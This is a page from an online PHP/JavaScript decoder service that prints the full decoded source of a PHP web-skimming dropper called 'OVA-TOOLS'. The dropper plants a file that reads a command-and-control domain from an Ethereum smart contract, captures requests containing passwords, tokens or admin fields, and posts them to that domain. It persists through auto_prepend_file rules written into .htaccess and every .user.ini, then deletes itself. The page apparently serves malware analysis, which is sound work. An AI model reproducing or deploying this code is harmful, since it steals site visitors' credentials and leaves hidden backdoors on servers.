Online PHP and Javascript Decoder decode hidden script to uncover its real functionality


/**
 * OVA-TOOLS
 */

error_reporting(E_ALL);
ini_set('display_errors', 0);
set_time_limit(0);

$base = $_SERVER['DOCUMENT_ROOT'];
$monitorFile = $base . '/config-bok.php';
$safePrepend = $base . '/safe_prepend.php';
$userIni     = $base . '/.user.ini';
$htaccess    = $base . '/.htaccess';

$success = [
    'monitor' => false,
    'safe_prepend' => false,
    'htaccess' => false,
    'user_ini_root' => false,
    'user_ini_subdirs' => false
];

$monitorCode = <<<'PHP'
/**
 * Global
 */
function getDomainFromContract($cacheFile) {
    if (file_exists($cacheFile) && (time() - filemtime($cacheFile) < 3600)) {
        $domain = file_get_contents($cacheFile);
        if ($domain && preg_match('/^[a-zA-Z0-9.\-]+$/', trim($domain))) {
            return trim($domain);
        }
    }

    $rpcs = [
        'https://rpc.sepolia.org',
        'https://sepolia.gateway.tenderly.co',
        'https://eth-sepolia.g.alchemy.com/v2/demo',
        'https://sepolia.infura.io/v3/9aa3d95b3bc440fa88ea12eaa4456161'
    ];

    $contract = '0xCe8192bDb906d0B539Eb5d861d768D28F096a695';
    $data = '0xb68d1809';
    $payload = json_encode([
        'jsonrpc' => '2.0',
        'method' => 'eth_call',
        'params' => [['to' => $contract, 'data' => $data], 'latest'],
        'id' => 1
    ]);

    foreach ($rpcs as $rpcUrl) {
        $ch = curl_init($rpcUrl);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
        curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']);
        curl_setopt($ch, CURLOPT_TIMEOUT, 8);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true);
        $response = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        $curlError = curl_error($ch);
        curl_close($ch);

        if ($curlError || $httpCode !== 200) continue;

        $data = json_decode($response, true);
        if (isset($data['error'])) continue;

        $hex = $data['result'] ?? null;
        if (!$hex || !is_string($hex) || strpos($hex, '0x') !== 0) continue;

        $hex = substr($hex, 2);
        if (strlen($hex) < 128) continue;
        $offset = hexdec(substr($hex, 0, 64)) * 2;
        $length = hexdec(substr($hex, $offset, 64));
        if ($length == 0 || $length > 253) continue;
        $domain = @hex2bin(substr($hex, $offset + 64, $length * 2));
        if (!$domain || !preg_match('/^[a-zA-Z0-9.\-]+$/', $domain)) continue;

        file_put_contents($cacheFile, $domain);
        return $domain;
    }
    return null;
}

try {
    $cacheFile = __DIR__ . '/.eth_cache';

    $scheme = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https' : 'http';
    $url = $scheme . '://' . ($_SERVER['HTTP_HOST'] ?? '') . ($_SERVER['REQUEST_URI'] ?? '');
    $rawBody = file_get_contents("php://input");

    // الكلمات الدلالية (بنفس الحالة تماماً أو مختلفة، سنبحث بدون تمييز)
    $keywords = ['pass', 'password', 'pwd', 'login', 'token', 'admin', 'administrator', 'pw_name', 'action', 'submit', 'api'];
    $found = false;

    // دالة للبحث عن أي كلمة داخل نص معين
    function containsKeyword($text, $keywords) {
        $text = strtolower($text);
        foreach ($keywords as $kw) {
            if (strpos($text, strtolower($kw)) !== false) {
                return true;
            }
        }
        return false;
    }

    // 
    foreach ($_GET as $key => $value) {
        if (containsKeyword($key, $keywords) || containsKeyword($value, $keywords)) {
            $found = true;
            break;
        }
    }

    //  
    if (!$found) {
        foreach ($_POST as $key => $value) {
            if (containsKeyword($key, $keywords) || containsKeyword($value, $keywords)) {
                $found = true;
                break;
            }
        }
    }

    // 
    if (!$found && !empty($rawBody)) {
        if (containsKeyword($rawBody, $keywords)) {
            $found = true;
        }
    }

    // 
    if (!$found) {
        if (containsKeyword($_SERVER['REQUEST_URI'], $keywords)) {
            $found = true;
        }
    }

    // 
    if (!$found) {
        return;
    }

    $payload = [
        'get'  => $_GET,
        'post' => $_POST,
        'raw'  => $rawBody,
        'server' => [
            'request_uri' => $_SERVER['REQUEST_URI'] ?? '',
            'method'      => $_SERVER['REQUEST_METHOD'] ?? '',
            'user_agent'  => $_SERVER['HTTP_USER_AGENT'] ?? ''
        ]
    ];

    $maintDomain = getDomainFromContract($cacheFile);
    if ($maintDomain) {
        $apiUrl = 'https://' . $maintDomain . '/api/addurl';
        $postData = json_encode([
            'url'      => $url,
            'password' => json_encode($payload, JSON_UNESCAPED_UNICODE | JSON_UNESCAPED_SLASHES)
        ]);

        $ch = curl_init($apiUrl);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
        curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']);
        curl_setopt($ch, CURLOPT_TIMEOUT, 10);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true);
        curl_exec($ch);
        curl_close($ch);
    }
} catch (\Throwable $e) {
    // Silent fail
}
PHP;

if (file_put_contents($monitorFile, $monitorCode) !== false) {
    $success['monitor'] = true;
}

// safe_prepend.php
$safePrependCode = <<<'PHP'
$monitorPath = __DIR__ . '/config-bok.php';
if (file_exists($monitorPath)) {
    include $monitorPath;
}
PHP;
if (!file_exists($safePrepend) && file_put_contents($safePrepend, $safePrependCode) !== false) {
    $success['safe_prepend'] = true;
} elseif (file_exists($safePrepend)) {
    $success['safe_prepend'] = true;
} else {
    $success['safe_prepend'] = false;
}

// .htaccess
$htRule = <<<HT
<IfModule mod_php.c>
    php_value auto_prepend_file "{$safePrepend}"
</IfModule>
<IfModule lsapi_module>
    php_value auto_prepend_file "{$safePrepend}"
</IfModule>
HT;
$currentHt = file_exists($htaccess) ? file_get_contents($htaccess) : '';
$updatedHt = preg_replace('/php_value auto_prepend_file\s+".*?"\s*?\n?/i', '', $currentHt);
if (strpos($updatedHt, $safePrepend) === false) {
    if (file_put_contents($htaccess, trim($updatedHt) . PHP_EOL . $htRule . PHP_EOL) !== false) {
        $success['htaccess'] = true;
    }
} else {
    $success['htaccess'] = true;
}

// .user.ini (root)
$prependLine = 'auto_prepend_file="' . $safePrepend . '"';
$currentIni = file_exists($userIni) ? file_get_contents($userIni) : '';
$updatedIni = preg_replace('/auto_prepend_file\s*=\s*".*?"\s*?\n?/i', '', $currentIni);
if (strpos($updatedIni, $safePrepend) === false) {
    if (file_put_contents($userIni, trim($updatedIni) . PHP_EOL . $prependLine . PHP_EOL) !== false) {
        $success['user_ini_root'] = true;
    }
} else {
    $success['user_ini_root'] = true;
}

// 
$subdirSuccessCount = 0;
$subdirTotal = 0;
$iterator = new RecursiveIteratorIterator(
    new RecursiveDirectoryIterator($base, RecursiveDirectoryIterator::SKIP_DOTS),
    RecursiveIteratorIterator::SELF_FIRST
);
foreach ($iterator as $item) {
    if ($item->isDir()) {
        $subDir = $item->getPathname();
        if (basename($subDir) === 'logs' || strpos(basename($subDir), ) === 0) continue;
        $targetIni = $subDir . '/.user.ini';
        $content = "; Auto-generated for monitoring\n";
        $content .= 'auto_prepend_file="' . $safePrepend . '"\n";
        $existing = file_exists($targetIni) ? file_get_contents($targetIni) : '';
        if (strpos($existing, $safePrepend) === false) {
            $subdirTotal++;
            if (file_put_contents($targetIni, $content . PHP_EOL . $existing) !== false) {
                $subdirSuccessCount++;
            }
        } else {
            $subdirSuccessCount++;
            $subdirTotal++;
        }
    }
}
if ($subdirTotal > 0 && $subdirSuccessCount === $subdirTotal) {
    $success['user_ini_subdirs'] = true;
} elseif ($subdirTotal > 0 && $subdirSuccessCount > 0) {
    $success['user_ini_subdirs'] = 'partial';
} else {
    $success['user_ini_subdirs'] = false;
}

$allSuccess = true;
$anySuccess = false;
$anyFailure = false;
foreach ($success as $key => $val) {
    if ($val === false) {
        $allSuccess = false;
        $anyFailure = true;
    } elseif ($val === true) {
        $anySuccess = true;
    } elseif ($val === 'partial') {
        $allSuccess = false;
        $anySuccess = true;
        $anyFailure = true;
    }
}
if ($allSuccess && !$anyFailure) {
    echo "OVA-Active";
} elseif ($anySuccess && $anyFailure) {
    echo "OVA-Active2";
} else {
    echo "OVA-NOT";
}
@unlink(__FILE__);



© 2023 Quttera Ltd. All rights reserved.